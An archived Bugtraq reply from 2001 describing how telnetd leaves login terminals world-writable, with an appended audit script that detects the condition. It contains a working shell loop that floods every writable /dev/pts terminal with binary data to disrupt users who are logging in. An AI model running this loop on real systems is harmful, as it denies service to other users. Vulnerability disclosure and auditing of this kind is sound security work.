Bugtraq mailing list archives

Re: Securax Advisory 13


From: teleh0r <teleh0r () DOGLOVER COM>
Date: Wed, 3 Jan 2001 06:35:48 +0100

I wrote a shell script which would flood the terminal of a user
trying to log in a long time ago - it was placed on my website
and someone called "c0sa_n0stra" mailed me and asked me to
explain how it worked and then he was kind enough to send it to
packetstorm, adding his handle in the process (and an ASCII cow).

(http://packetstorm.securify.com/DoS/m000h.sh)

The problem is the way that the telnet daemon assigns a new user
a terminal - when a user is telling the telnetd who he is, and
what his password is, his terminal will be waiting in /dev/pts/
and writable by anyone. As soon as he has logged in, it will not.

It is still possible for him to log in though, even if a binary is
cat'ed to the terminal.
(but as said by Fyodor, it may mess up his terminal)

sshd/rshd/rlogind do not behave this way - there will be no writable
terminal in /dev/pts/ while the authentication is taking place.

The below script has been tested on Redhat 6.1 and 6.2.
----
#!/bin/sh

TTYDIR=/dev/pts
NONSENSE=/bin/nice
MYTTY=`tty` # To prevent flooding of one's own TTY

while :; do
    for i in $TTYDIR/* ; do
        if [ -w $i -a -c $i -a $i != $MYTTY ]; then
            cat $NONSENSE > $i
        fi
    done
done

unset i
----

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
                -- Elbert Hubbard
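
For an administrator checking whether a host shows the condition described in the message above (a terminal in /dev/pts/ that anyone can write to while a login is in progress), the following audit script is an added example, not part of the original post. It assumes Linux with GNU `stat`; the function names `mode_exposed` and `audit_ptys` are made up for this illustration.

```shell
#!/bin/sh
# Added example: report pseudo-terminals that users other than the owner
# can write to. Assumes GNU stat (-c); function names are hypothetical.

# Succeeds when the "other" digit of an octal mode has the write bit set.
mode_exposed() {
    case "${1#"${1%?}"}" in      # last character of the mode string
        2|3|6|7) return 0 ;;
        *) return 1 ;;
    esac
}

# Print "path owner mode" for each exposed terminal in a directory.
# Returns 1 if at least one was found, 0 otherwise.
audit_ptys() {
    dir=${1:-/dev/pts}
    found=0
    for t in "$dir"/*; do
        # ptmx is the pty multiplexer, not a session terminal
        case "$t" in */ptmx) continue ;; esac
        [ -c "$t" ] || continue
        info=$(stat -L -c '%a %U' "$t" 2>/dev/null) || continue
        mode=${info%% *}
        owner=${info#* }
        if mode_exposed "$mode"; then
            echo "$t $owner $mode"
            found=1
        fi
    done
    return "$found"
}

audit_ptys "${1:-/dev/pts}" || echo "world-writable terminals found" >&2
```

Because the exposure only exists while authentication is taking place, a single run can miss it; running the check repeatedly during a test telnet login shows whether the daemon hands out the terminal with the write bit set for others.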

